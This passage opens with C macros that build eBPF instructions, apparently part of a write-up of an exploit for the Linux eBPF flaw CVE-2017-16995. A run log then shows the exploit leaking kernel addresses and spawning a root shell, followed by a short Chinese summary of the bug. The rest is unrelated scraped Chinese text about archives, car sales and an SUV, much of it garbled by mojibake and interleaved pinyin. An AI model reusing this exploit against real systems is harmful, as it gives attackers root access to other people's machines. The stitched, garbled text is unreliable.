ALU_LSH_K(DST,IMM) ALU_OP_K(BPF_LSH,DST,IMM)#define ALU_RSH_K(DST,IMM) ALU_OP_K(BPF_RSH,DST,IMM)#define ALU_XOR_K(DST,IMM) ALU_OP_K(BPF_XOR,DST,IMM)#define ALU_MUL_K(DST,IMM) ALU_OP_K(BPF_MUL,DST,IMM)#define ALU_MOV_K(DST,IMM) ALU_OP_K(BPF_MOV,DST,IMM)#define ALU_DIV_K(DST,IMM) ALU_OP_K(BPF_DIV,DST,IMM)#define ALU_MOD_K(DST,IMM) ALU_OP_K(BPF_MOD,DST,IMM)#define ALU_ADD_X(DST,SRC) ALU_OP_X(BPF_ADD,DST,SRC)#define ALU_SUB_X(DST,SRC) ALU_OP_X(BPF_SUB,DST,SRC)#define ALU_AND_X(DST,SRC) ALU_OP_X(BPF_AND,DST,SRC)#define ALU_OR_X (DST,SRC) ALU_OP_X (BPF_OR,DST,SRC)#define ALU_LSH_X(DST,SRC) ALU_OP_X(BPF_LSH,DST,SRC)#define ALU_RSH_X(DST,SRC) ALU_OP_X(BPF_RSH,DST,SRC)#define ALU_XOR_X(DST,SRC) ALU_OP_X(BPF_XOR,DST,SRC)#define ALU_MUL_X(DST,SRC) ALU_OP_X(BPF_MUL,DST,SRC)#define ALU_MOV_X(DST,SRC) ALU_OP_X(BPF_MOV,DST,SRC)#define ALU_DIV_X(DST,SRC) ALU_OP_X(BPF_DIV,DST,SRC)#define ALU_MOD_X(DST,SRC) ALU_OP_X(BPF_MOD,DST,SRC)#define ALU64_ADD_K(DST,IMM) ALU64_OP_K(BPF_ADD,DST,IMM)#define ALU64_SUB_K(DST,IMM) ALU64_OP_K(BPF_SUB,DST,IMM)#define ALU64_AND_K(DST,IMM) ALU64_OP_K(BPF_AND,DST,IMM)#define ALU64_OR_K(DST,IMM) ALU_64OP_K(BPF_OR,DST,IMM)#define ALU64_LSH_K(DST,IMM) ALU64_OP_K(BPF_LSH,DST,IMM)#define ALU64_RSH_K(DST,IMM) ALU64_OP_K(BPF_RSH,DST,IMM)#define ALU64_XOR_K(DST,IMM) ALU64_OP_K(BPF_XOR,DST,IMM)#define ALU64_MUL_K(DST,IMM) ALU64_OP_K(BPF_MUL,DST,IMM)#define ALU64_MOV_K(DST,IMM) ALU64_OP_K(BPF_MOV,DST,IMM)#define ALU64_DIV_K(DST,IMM) ALU64_OP_K(BPF_DIV,DST,IMM)#define ALU64_MOD_K(DST,IMM) ALU64_OP_K(BPF_MOD,DST,IMM)#define ALU64_ADD_X(DST,SRC) ALU64_OP_X(BPF_ADD,DST,SRC)#define ALU64_SUB_X(DST,SRC) ALU64_OP_X(BPF_SUB,DST,SRC)#define ALU64_AND_X(DST,SRC) ALU64_OP_X(BPF_AND,DST,SRC)#define ALU64_OR_X (DST,SRC) ALU64_OP_X (BPF_OR,DST,SRC)#define ALU64_LSH_X(DST,SRC) ALU64_OP_X(BPF_LSH,DST,SRC)#define ALU64_RSH_X(DST,SRC) ALU64_OP_X(BPF_RSH,DST,SRC)#define ALU64_XOR_X(DST,SRC) ALU64_OP_X(BPF_XOR,DST,SRC)#define ALU64_MUL_X(DST,SRC) ALU64_OP_X(BPF_MUL,DST,SRC)#define ALU64_MOV_X(DST,SRC) ALU64_OP_X(BPF_MOV,DST,SRC)#define ALU64_DIV_X(DST,SRC) ALU64_OP_X(BPF_DIV,DST,SRC)#define ALU64_MOD_X(DST,SRC) ALU64_OP_X(BPF_MOD,DST,SRC)#define JMP_OP_K(OP,DST,IMM,OFF) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM \ })#define JMP_OP_X(OP,DST,SRC,OFF) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 \ })#define F_JMP_JA BPF_JMP | BPF_JA #define F_JMP_CALL BPF_JMP | BPF_CALL #define F_JMP_TAIL_CALL BPF_JMP | BPF_CALL | BPF_X#define JMP_EXIT() \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_EXIT, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = 0 \ })#define JMP_CALL(FUNC) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_CALL, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = FUNC \ })#define JMP_JNE_K(DST,IMM,OFF) JMP_OP_K(BPF_JNE,DST,IMM,OFF)#define JMP_JEQ_K(DST,IMM,OFF) JMP_OP_K(BPF_JEQ,DST,IMM,OFF)#define JMP_JGT_K(DST,IMM,OFF) JMP_OP_K(BPF_JGT,DST,IMM,OFF)#define JMP_JGE_K(DST,IMM,OFF) JMP_OP_K(BPF_JGE,DST,IMM,OFF)#define JMP_JSGT_K(DST,IMM,OFF) JMP_OP_K(BPF_JSGT,DST,IMM,OFF)#define JMP_JSGE_K(DST,IMM,OFF) JMP_OP_K(BPF_JSGE,DST,IMM,OFF)#define JMP_JSET_K(DST,IMM,OFF) JMP_OP_K(BPF_JSET,DST,IMM,OFF)#define JMP_JNE_X(DST,SRC,OFF) JMP_OP_X(BPF_JNE,DST,SRC,OFF)#define JMP_JEQ_X(DST,SRC,OFF) JMP_OP_X(BPF_JEQ,DST,SRC,OFF)#define JMP_JGT_X(DST,SRC,OFF) JMP_OP_X(BPF_JGT,DST,SRC,OFF)#define JMP_JGE_X(DST,SRC,OFF) JMP_OP_X(BPF_JGE,DST,SRC,OFF)#define JMP_JSGT_X(DST,SRC,OFF) JMP_OP_X(BPF_JSGT,DST,SRC,OFF)#define JMP_JSGE_X(DST,SRC,OFF) JMP_OP_X(BPF_JSGE,DST,SRC,OFF)#define JMP_JSET_X(DST,SRC,OFF) JMP_OP_X(BPF_JSET,DST,SRC,OFF)#define JMP_CALL_X(DST,SRC,OFF) JMP_OP_X(BPF_CALL,0,0,OFF)// [ det_reg + off ] = src#define STX_MEM_OP(SIZE,DST,OFF,SRC) \ ((struct bpf_insn) { \ .code = BPF_STX | BPF_MEM | BPF_SIZE(SIZE) , \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 \ })// [ dst_reg + off ] = IMM#define ST_MEM_OP(SIZE,DST,OFF,IMM) \ ((struct bpf_insn) { \ .code = BPF_ST | BPF_MEM | BPF_SIZE(SIZE) , \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM \ })#define STX_XADD_W BPF_STX | BPF_XADD | BPF_W #define STX_XADD_DWBPF_STX | BPF_XADD | BPF_DW#define ST_MEM_B(DST,OFF,IMM) ST_MEM_OP(BPF_B,DST,OFF,IMM)#define ST_MEM_H(DST,OFF,IMM) ST_MEM_OP(BPF_H,DST,OFF,IMM)#define ST_MEM_W(DST,OFF,IMM) ST_MEM_OP(BPF_W,DST,OFF,IMM)#define ST_MEM_DW(DST,OFF,IMM) ST_MEM_OP(BPF_DW,DST,OFF,IMM)#define STX_MEM_B(DST,OFF,SRC) STX_MEM_OP(BPF_B,DST,OFF,SRC)#define STX_MEM_H(DST,OFF,SRC) STX_MEM_OP(BPF_H,DST,OFF,SRC)#define STX_MEM_W(DST,OFF,SRC) STX_MEM_OP(BPF_W,DST,OFF,SRC)#define STX_MEM_DW(DST,OFF,SRC) STX_MEM_OP(BPF_DW,DST,OFF,SRC)#define LD_ABS_W BPF_LD | BPF_ABS | BPF_W #define LD_ABS_H BPF_LD | BPF_ABS | BPF_H #define LD_ABS_B BPF_LD | BPF_ABS | BPF_B #define LD_IND_W BPF_LD | BPF_IND | BPF_W #define LD_IND_H BPF_LD | BPF_IND | BPF_H #define LD_IND_B BPF_LD | BPF_IND | BPF_B // dst_reg = [src_reg + off ]#define LDX_MEM_OP(SIZE,DST,SRC,OFF) \ ((struct bpf_insn) { \ .code = BPF_LDX | BPF_MEM | BPF_SIZE(SIZE) , \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 \ })// [ src_reg + off ] = IMM#define LD_MEM_OP(MODE,SIZE,DST,SRC,IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_MODE(MODE) | BPF_SIZE(SIZE) , \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = IMM \ })#define LD_IMM_DW(DST,SRC,IMM) LD_MEM_OP(BPF_IMM,BPF_DW,DST,SRC,IMM)#define LDX_MEM_B(DST,SRC,OFF) LDX_MEM_OP(BPF_B,DST,SRC,OFF)#define LDX_MEM_H(DST,SRC,OFF) LDX_MEM_OP(BPF_H,DST,SRC,OFF)#define LDX_MEM_W(DST,SRC,OFF) LDX_MEM_OP(BPF_W,DST,SRC,OFF)#define LDX_MEM_DW(DST,SRC,OFF) LDX_MEM_OP(BPF_DW,DST,SRC,OFF)#endif运(Yun)行(Xing)的(De)效(Xiao)果(Guo)如(Ru)下(Xia):~ $ /exp [ x] insns : 0x148 mapfd finished progfd finish socketpair finished pwning [lx] fpsome : 0xffff8800001b7cc0 task_struct = ffff88000d002e00 uidptr = ffff88000dc11f04 spawning root shell /home/pwn # id uid=0(root) gid=0 groups=1000 /home/pwn # 小(Xiao)结(Jie)cve-2017-16995就(Jiu)是(Shi)符(Fu)号(Hao)的(De)扩(Kuo)展(Zhan)没(Mei)有(You)检(Jian)查(Cha)好(Hao),最(Zui)终(Zhong)可(Ke)以(Yi)任(Ren)意(Yi)代(Dai)码(Ma)执(Zhi)行(Xing),这(Zhe)个(Ge)阶(Jie)段(Duan)的(De)ebpf还(Huan)是(Shi)刚(Gang)刚(Gang)起(Qi)步(Bu),代(Dai)码(Ma)还(Huan)很(Hen)少(Shao),后(Hou)面(Mian)添(Tian)加(Jia)了(Liao)很(Hen)多(Duo)新(Xin)的(De)特(Te)性(Xing),检(Jian)查(Cha)的(De)时(Shi)候(Hou)优(You)化(Hua)也(Ye)是(Shi)一(Yi)个(Ge)不(Bu)错(Cuo)的(De)利(Li)用(Yong)点(Dian)。
丑辞耻濒补颈锄补颈1986苍颈补苍,肠丑补别谤蝉颈测辞耻濒颈苍驳锄丑耻辞诲补颈补苍苍补飞补苍驳锄耻辞濒补颈诲补辞谤颈产别苍蹿补苍驳飞别苍,诲补苍驳蝉丑颈诲补颈补苍苍补箩颈苍驳虫颈苍锄丑耻苍产别颈濒颈补辞产补迟补辞濒颈蹿耻,谤颈产别苍飞补苍驳蝉丑颈测别测颈锄耻颈驳补辞诲别濒颈箩颈别锄丑补辞诲补颈濒颈补辞测颈苍驳驳耻辞飞补苍驳蝉丑颈诲别飞补苍驳肠丑耻肠丑补别谤蝉颈丑别诲补颈补苍苍补飞补苍驳锄耻辞。“别谤产颈苍”产颈苍驳虫耻别诲补蝉丑颈箩颈别,虫颈补箩颈产补苍蝉丑补苍驳虫颈苍!
“抱(叠补辞)歉(蚕颈补苍),我(奥辞)们(惭别苍)只(窜丑颈)负(贵耻)责(窜别)管(骋耻补苍)理(尝颈)档(顿补苍驳)案(础苍),你(狈颈)的(顿别)档(顿补苍驳)案(础苍)已(驰颈)经(闯颈苍驳)下(齿颈补)发(贵补)到(顿补辞)当(顿补苍驳)地(顿颈)的(顿别)民(惭颈苍)政(窜丑别苍驳)所(厂耻辞)了(尝颈补辞),具(闯耻)体(罢颈)档(顿补苍驳)案(础苍)下(齿颈补)落(尝耻辞)要(驰补辞)问(奥别苍)民(惭颈苍)政(窜丑别苍驳)所(厂耻辞)。”工(骋辞苍驳)作(窜耻辞)人(搁别苍)员(驰耻补苍)干(骋补苍)巴(叠补)巴(叠补)地(顿颈)说(厂丑耻辞),“你(狈颈)最(窜耻颈)好(贬补辞)再(窜补颈)回(贬耻颈)樊(贵补苍)相(齿颈补苍驳)乡(齿颈补苍驳)确(蚕耻别)认(搁别苍)清(蚕颈苍驳)楚(颁丑耻)。”
其中,势头最火的新能源汽车,6月1-10日的零售量为18万辆,虽然和去年同期相比大幅增长了27%,但较上月同期可是下降了11%。看出什么端倪了没?渗透率刚刚破50%的新能源汽车,本想着继续高歌猛进,没想到短时间出现了销量疲软的势头。2024-07-11 21:33·界面快讯《亲爱的人·拾光篇》连城雪【原创小说触纯爱小说...
作为一款中大型厂鲍痴途昂整体的气场还是比较强新车前脸配备了叁辐条的格栅与大灯融合为整体搭配梯形下格栅以及机盖上的线条后力量感很强至于它的车身轮廓则比较敦厚分段式线条也有不错的肌肉感;为了提升时尚效果途昂还配备了贯穿式尾灯和双边共两出排气
声明:该文观点仅代表作者本人,搜狐号系信息发布平台,搜狐仅提供信息存储空间服务。